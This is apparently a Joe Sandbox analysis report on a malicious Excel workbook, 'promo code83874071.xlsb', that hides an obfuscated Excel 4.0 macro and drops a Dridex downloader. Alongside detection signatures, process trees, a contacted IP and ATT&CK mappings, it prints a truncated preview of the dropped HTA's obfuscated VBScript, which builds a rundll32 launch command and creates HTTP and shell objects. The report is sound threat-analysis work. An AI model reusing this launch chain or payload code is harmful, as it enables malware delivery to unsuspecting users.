Loading ...

Play interactive tourEdit tour

Windows Analysis Report promo code83874071.xlsb

Overview

General Information

Sample Name:promo code83874071.xlsb
Analysis ID:528041
MD5:b6c09b88eeb411e648f688e7ca6a1ca9
SHA1:da6a58fbb01118bf77842f75cb217c3cf33ded2f
SHA256:cb53bf4394e7f77534ca8bfa1039fc76c50a54be4dce411926dbb594a1a55c52
Tags:xlsbxlsx
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex Downloader
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Dridex Downloader
Multi AV Scanner detection for submitted file
Creates and opens a fake document (probably a fake document to hide exploiting)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Creates processes via WMI
Document exploit detected (UrlDownloadToFile)
Found protected and hidden Excel 4.0 Macro sheet
Contains functionality to create processes via WMI
Found obfuscated Excel 4.0 Macro
Queries the volume information (name, serial number etc) of a device
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
May sleep (evasive loops) to hinder dynamic analysis
Yara detected Xls With Macro 4.0
Detected TCP or UDP traffic on non-standard ports
Sigma detected: Suspicious WMI Execution
Creates a window with clipboard capturing capabilities
IP address seen in connection with other malware

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1296 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WMIC.exe (PID: 1160 cmdline: wmic process call create "mshta C:\ProgramData\MqscKrfE.rtf" MD5: FD902835DEAEF4091799287736F3A028)
  • mshta.exe (PID: 2976 cmdline: mshta C:\ProgramData\MqscKrfE.rtf MD5: 95828D670CFD3B16EE188168E083C3C5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\MqscKrfE.rtfJoeSecurity_DridexDownloaderYara detected Dridex DownloaderJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: wmic process call create "mshta C:\ProgramData\MqscKrfE.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\MqscKrfE.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1296, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\MqscKrfE.rtf", ProcessId: 1160
      Sigma detected: Suspicious WMI ExecutionShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, juju4, oscd.community: Data: Command: wmic process call create "mshta C:\ProgramData\MqscKrfE.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\MqscKrfE.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1296, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\MqscKrfE.rtf", ProcessId: 1160

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: promo code83874071.xlsbVirustotal: Detection: 10%Perma Link
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

      Software Vulnerabilities:

      barindex
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe
      Document exploit detected (UrlDownloadToFile)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 136.144.181.174:8080
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 136.144.181.174:8080
      Source: Joe Sandbox ViewIP Address: 136.144.181.174 136.144.181.174
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.181.174
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.181.174
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.181.174
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.181.174
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.181.174
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.181.174
      Source: mshta.exe, 00000005.00000002.669318860.0000000003500000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
      Source: mshta.exe, 00000005.00000002.669318860.0000000003500000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
      Source: mshta.exe, 00000005.00000002.669318860.0000000003500000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
      Source: mshta.exe, 00000005.00000002.669522245.00000000036E7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: mshta.exe, 00000005.00000002.669522245.00000000036E7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: mshta.exe, 00000005.00000002.669730652.00000000039E0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: WMIC.exe, 00000002.00000002.451914600.0000000001CC0000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
      Source: mshta.exe, 00000005.00000002.669522245.00000000036E7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: mshta.exe, 00000005.00000002.669522245.00000000036E7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: mshta.exe, 00000005.00000002.669730652.00000000039E0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
      Source: mshta.exe, 00000005.00000002.669318860.0000000003500000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
      Source: mshta.exe, 00000005.00000002.669522245.00000000036E7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: mshta.exe, 00000005.00000002.669318860.0000000003500000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
      Source: mshta.exe, 00000005.00000002.669318860.0000000003500000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\930D9B79.pngJump to behavior
      Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

      E-Banking Fraud:

      barindex
      Yara detected Dridex DownloaderShow sources
      Source: Yara matchFile source: C:\ProgramData\MqscKrfE.rtf, type: DROPPED

      System Summary:

      barindex
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: promo code83874071.xlsbInitial sample: EXEC
      Found protected and hidden Excel 4.0 Macro sheetShow sources
      Source: promo code83874071.xlsbInitial sample: Sheet name: Macro1
      Contains functionality to create processes via WMIShow sources
      Source: WMIC.exe, 00000002.00000002.451787136.00000000002E0000.00000004.00000020.sdmpBinary or memory string: C:\Users\user\Documents\C:\Windows\System32\Wbem;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\System32\Wbem\wmic.exewmic process call create "mshta C:\ProgramData\MqscKrfE.rtf"C:\Windows\System32\Wbem\wmic.exeWinSta0\Default
      Found obfuscated Excel 4.0 MacroShow sources
      Source: promo code83874071.xlsbMacro extractor: Sheet: Macro1 high usage of CHAR() function: 59
      Source: promo code83874071.xlsbMacro extractor: Sheet name: Macro1
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
      Source: promo code83874071.xlsbVirustotal: Detection: 10%
      Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\MqscKrfE.rtf"
      Source: unknownProcess created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\MqscKrfE.rtf
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\MqscKrfE.rtf"Jump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
      Source: mshta.exe, 00000005.00000002.669318860.0000000003500000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$promo code83874071.xlsbJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD825.tmpJump to behavior
      Source: classification engineClassification label: mal92.troj.expl.evad.winXLSB@4/4@0/1
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: promo code83874071.xlsbInitial sample: OLE zip file path = xl/media/image2.png
      Source: promo code83874071.xlsbInitial sample: OLE zip file path = xl/media/image1.png
      Source: promo code83874071.xlsbInitial sample: OLE zip file path = docProps/custom.xml
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

      Persistence and Installation Behavior:

      barindex
      Creates processes via WMIShow sources
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Creates and opens a fake document (probably a fake document to hide exploiting)Show sources
      Source: unknownProcess created: cmd line: mqsckrfe.rtf
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: cmd line: mqsckrfe.rtfJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exe TID: 2964Thread sleep time: -180000s >= -30000sJump to behavior
      Source: C:\Windows\System32\mshta.exe TID: 1972Thread sleep time: -60000s >= -30000sJump to behavior
      Source: Yara matchFile source: app.xml, type: SAMPLE
      Source: mshta.exe, 00000005.00000002.668579940.0000000000F20000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: mshta.exe, 00000005.00000002.668579940.0000000000F20000.00000002.00020000.sdmpBinary or memory string: !Progman
      Source: mshta.exe, 00000005.00000002.668579940.0000000000F20000.00000002.00020000.sdmpBinary or memory string: Program Manager<
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management Instrumentation21Path InterceptionProcess Injection2Masquerading1OS Credential DumpingVirtualization/Sandbox Evasion1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumNon-Standard Port1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScripting3Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemoryProcess Discovery1Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsExploitation for Client Execution31Logon Script (Windows)Logon Script (Windows)Process Injection2Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting3NTDSSystem Information Discovery15Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      promo code83874071.xlsb10%VirustotalBrowse

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://www.%s.comPA0%URL Reputationsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://servername/isapibackend.dll0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkmshta.exe, 00000005.00000002.669522245.00000000036E7000.00000002.00020000.sdmpfalse
        high
        http://www.windows.com/pctv.mshta.exe, 00000005.00000002.669318860.0000000003500000.00000002.00020000.sdmpfalse
          high
          http://investor.msn.commshta.exe, 00000005.00000002.669318860.0000000003500000.00000002.00020000.sdmpfalse
            high
            http://www.msnbc.com/news/ticker.txtmshta.exe, 00000005.00000002.669318860.0000000003500000.00000002.00020000.sdmpfalse
              high
              http://www.%s.comPAmshta.exe, 00000005.00000002.669730652.00000000039E0000.00000002.00020000.sdmpfalse
              • URL Reputation: safe
              low
              http://www.icra.org/vocabulary/.mshta.exe, 00000005.00000002.669522245.00000000036E7000.00000002.00020000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.mshta.exe, 00000005.00000002.669730652.00000000039E0000.00000002.00020000.sdmpfalse
                high
                http://windowsmedia.com/redir/services.asp?WMPFriendly=truemshta.exe, 00000005.00000002.669522245.00000000036E7000.00000002.00020000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.hotmail.com/oemshta.exe, 00000005.00000002.669318860.0000000003500000.00000002.00020000.sdmpfalse
                  high
                  http://servername/isapibackend.dllWMIC.exe, 00000002.00000002.451914600.0000000001CC0000.00000002.00020000.sdmpfalse
                  • Avira URL Cloud: safe
                  low
                  http://investor.msn.com/mshta.exe, 00000005.00000002.669318860.0000000003500000.00000002.00020000.sdmpfalse
                    high

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    136.144.181.174
                    unknownNetherlands
                    20857TRANSIP-ASAmsterdamtheNetherlandsNLfalse

                    General Information

                    Joe Sandbox Version:34.0.0 Boulder Opal
                    Analysis ID:528041
                    Start date:24.11.2021
                    Start time:17:46:09
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 5m 21s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:promo code83874071.xlsb
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:8
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal92.troj.expl.evad.winXLSB@4/4@0/1
                    EGA Information:Failed
                    HDC Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .xlsb
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Active AutoShape Object
                    • Active Picture Object
                    • Active Picture Object
                    • Scroll down
                    • Close Viewer
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtSetInformationFile calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    17:46:39API Interceptor11x Sleep call for process: WMIC.exe modified
                    17:46:40API Interceptor431x Sleep call for process: mshta.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    136.144.181.174vote number3210109.xlsbGet hashmaliciousBrowse
                      tax77567960.xlsbGet hashmaliciousBrowse
                        hunting license-25331.xlsbGet hashmaliciousBrowse
                          vote number3210109.xlsbGet hashmaliciousBrowse
                            tax77567960.xlsbGet hashmaliciousBrowse
                              subscription-84799.xlsbGet hashmaliciousBrowse
                                hunting license-25331.xlsbGet hashmaliciousBrowse
                                  subscription-84799.xlsbGet hashmaliciousBrowse
                                    8993268.xlsbGet hashmaliciousBrowse
                                      promo 2352017.xlsbGet hashmaliciousBrowse
                                        8993268.xlsbGet hashmaliciousBrowse
                                          promo 2352017.xlsbGet hashmaliciousBrowse
                                            Offer 373466695.xlsbGet hashmaliciousBrowse
                                              Offer 373466695.xlsbGet hashmaliciousBrowse
                                                9049521.xlsbGet hashmaliciousBrowse
                                                  9049521.xlsbGet hashmaliciousBrowse

                                                    Domains

                                                    No context

                                                    ASN

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    TRANSIP-ASAmsterdamtheNetherlandsNLvote number3210109.xlsbGet hashmaliciousBrowse
                                                    • 136.144.181.174
                                                    tax77567960.xlsbGet hashmaliciousBrowse
                                                    • 136.144.181.174
                                                    hunting license-25331.xlsbGet hashmaliciousBrowse
                                                    • 136.144.181.174
                                                    vote number3210109.xlsbGet hashmaliciousBrowse
                                                    • 136.144.181.174
                                                    tax77567960.xlsbGet hashmaliciousBrowse
                                                    • 136.144.181.174
                                                    subscription-84799.xlsbGet hashmaliciousBrowse
                                                    • 136.144.181.174
                                                    hunting license-25331.xlsbGet hashmaliciousBrowse
                                                    • 136.144.181.174
                                                    subscription-84799.xlsbGet hashmaliciousBrowse
                                                    • 136.144.181.174
                                                    8993268.xlsbGet hashmaliciousBrowse
                                                    • 136.144.181.174
                                                    promo 2352017.xlsbGet hashmaliciousBrowse
                                                    • 136.144.181.174
                                                    8993268.xlsbGet hashmaliciousBrowse
                                                    • 136.144.181.174
                                                    promo 2352017.xlsbGet hashmaliciousBrowse
                                                    • 136.144.181.174
                                                    Offer 373466695.xlsbGet hashmaliciousBrowse
                                                    • 136.144.181.174
                                                    Offer 373466695.xlsbGet hashmaliciousBrowse
                                                    • 136.144.181.174
                                                    9049521.xlsbGet hashmaliciousBrowse
                                                    • 136.144.181.174
                                                    9049521.xlsbGet hashmaliciousBrowse
                                                    • 136.144.181.174
                                                    arm6-20211124-0649Get hashmaliciousBrowse
                                                    • 37.97.150.92
                                                    4VsoRulf3zGet hashmaliciousBrowse
                                                    • 95.170.75.156
                                                    3XVTeL2yOEGet hashmaliciousBrowse
                                                    • 95.170.75.177
                                                    3CZk5xMzFdGet hashmaliciousBrowse
                                                    • 37.97.214.101

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\ProgramData\MqscKrfE.rtf
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4837
                                                    Entropy (8bit):5.069907978358339
                                                    Encrypted:false
                                                    SSDEEP:96:EBFenMtYKBMmqwrSxxx+kBoZGogeR2WeJVpz2CHBk+FX/B:EBFeMtRBMmqw+xxgkBoZ2Cyp6CHBk+lp
                                                    MD5:1CFF01224E36F917085D258D50118A8E
                                                    SHA1:9F4DB0467D5733FBF5554D257804175587D4C9F5
                                                    SHA-256:08C6AEE2C0D5C42B3E8E2DA43DB9F3775FE2DA95D8BCA17A42BC1F218E2C8A6F
                                                    SHA-512:6349CBF791C0B60F1D60E75E7037F8A9E09FF17B3241A159753248E0E4D30D6830ABC0763F70AEF14A01433DF59812D41D6CA1F6B8ECB58DFF61B2B2AB97DC79
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_DridexDownloader, Description: Yara detected Dridex Downloader, Source: C:\ProgramData\MqscKrfE.rtf, Author: Joe Security
                                                    Reputation:low
                                                    Preview: <!DOCTYPE html>..<html>..<head>..<HTA:APPLICATION ID="CS"..APPLICATIONNAME="ttrgnkrtegjtjgjerg"..WINDOWSTATE="minimize"..MAXIMIZEBUTTON="no"..MINIMIZEBUTTON="no"..CAPTION="no"..SHOWINTASKBAR="no">..<script type="text/vbscript" LANGUAGE="VBScript" >..l_h_V_f_v_n_A_p_a_o = Chr(114+1-1) & "und" & Chr(108+1-1) & "l32" & ".ex" & "e " & Chr(67+1-1) & Chr(58+1-1) & "\\" & "Pro" & "" & "gr" & Chr(97+1-1) & "" & Chr(109+1-1) & "Da" & "ta" & "\ux" & "nig" & "ge" & "r.b" & "in" & " Dl" & Chr(108+1-1) & "Re" & "gis" & Chr(116+1-1) & "" & "erS" & "" & "" & "er" & Chr(118+1-1) & Chr(101+1-1) & Chr(114+1-1)..Set H_y_H_u_M_Z_N_q_s_B_t_f = CreateObject(Chr(77+1-1) & "SX" & "" & "ML2" & "" & ".Se" & "" & "rve" & "rXM" & "" & "" & "LH" & "TTP" & "" & ".6." & Chr(48+1-1))....F_c_M_I_P_M_P = Chr(87+1-1) & Chr(115+1-1) & "" & "" & "cr" & "" & "" & Chr(105+1-1) & "pt" & ".Sh" & Chr(101+1-1) & "ll"..Set x_V_R_c_H_E_A_D = CreateObject(F_c_M_I_P_M_P)..c_B_R_p_U_s_M_Z_S_H_U_o_f_i = LCase(x_V_R_c_H_E_A_D.expanden
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\12741B26.png
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PNG image data, 263 x 339, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):44006
                                                    Entropy (8bit):7.976979311921259
                                                    Encrypted:false
                                                    SSDEEP:768:HPirG+t6Agvu1hp+S+bGDkP7wozsIukTKu/lvL7AbvWFp1m+MNd:HP2CET+S+agP7nA9u9DE2w
                                                    MD5:DA7AC5F9F71DEA76034FD690CFEBFE71
                                                    SHA1:F01154ACFD3B8792E5DB230C7205A4B618D45235
                                                    SHA-256:31B35E7A9BD151A7B1D88CAF5476D761F51030E61E0BC4DCD41684F52385A4ED
                                                    SHA-512:FA86DF5B9A482537FC9E9392F1C65237630B3CDAB2C6E58C160CD0C2C1644720C7B8211EB46FB405D9D9359C960E747A53088F9DE74B4AB4431DE62FA3FD98BA
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview: .PNG........IHDR.......S.....4..F...JiCCPICC Profile..x..W.TS...[RIh..H...R.K..E..*..I ...D....]D@].U.E...ZQ...]......l..I.]=...s........{g...I.....y.|Y|D.kBj.......Z...x|...........7..../.(......'.... q.g...<......|..>Po=#_.. 6...!.*q...(q..W.l..9....L..dY.h7C=....y.o@.*..%..!..x..#!...7M...p...'....C.<^..V..r.X.....?..%/W1...6.H.......F.(%.A.#...X..wb...b.*RD&..QS...k.....x.Q..B......32..\...A....D..EByX...F6->v.g.8l....L.Wi.R.............D.).1j.89.bm...(..fS$.........m ..J"B...LYx..^.'...[$.sc4.*_........7..Y(a'.......s..C..c...$M.X.4?$^3..47Nc.S...J......\<0..H5?.#.KT.gd......A4..P....2.4....=M=.z$....d.!p.h.g..F$...._...|h^.jT.....V.t..........<..r.o.j.d.[2x.5...a...)...&Z.Q..t.-.a.Pb$1.....?.......>..`._..........N...b.7...8..=.kr..:g...z.!x...8.7...h..A.P..D...[....U.5v.W.J.F..8|;S.I.s.EY.+..5c.....o.s.....Q.Zb..}X.v.;.....;.5c..J<....V..xU<9.G..?....r.z.n..|a....8.3e.,Q>....B.W..9........;.~M.b.......]q............8........Z..
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\930D9B79.png
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PNG image data, 253 x 56, 8-bit/color RGB, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):2132
                                                    Entropy (8bit):7.843504298247007
                                                    Encrypted:false
                                                    SSDEEP:48:sWXNC7ZlORZ6PY8PUWQSfh7qwP3vCO4aKskuWZnHW5PG:7X07KKPNPzflWRE9G
                                                    MD5:EE8845A94C57D17AD60274843D6352B4
                                                    SHA1:16BF71D674CE3AD0BABBC373784F1551CFF290C0
                                                    SHA-256:87030B4555CA7382C936656D1E9777EEC4A99DE34096CDF4B0CBF71D4B7C0327
                                                    SHA-512:26B1B09A77666292F427D4AFD150C8490C05201E59B2E11002B25897E3D04099206477A3212FFBE7A6278517DA08D7BB83DB5CF24E35754B00E7925A803E1D20
                                                    Malicious:false
                                                    Reputation:low
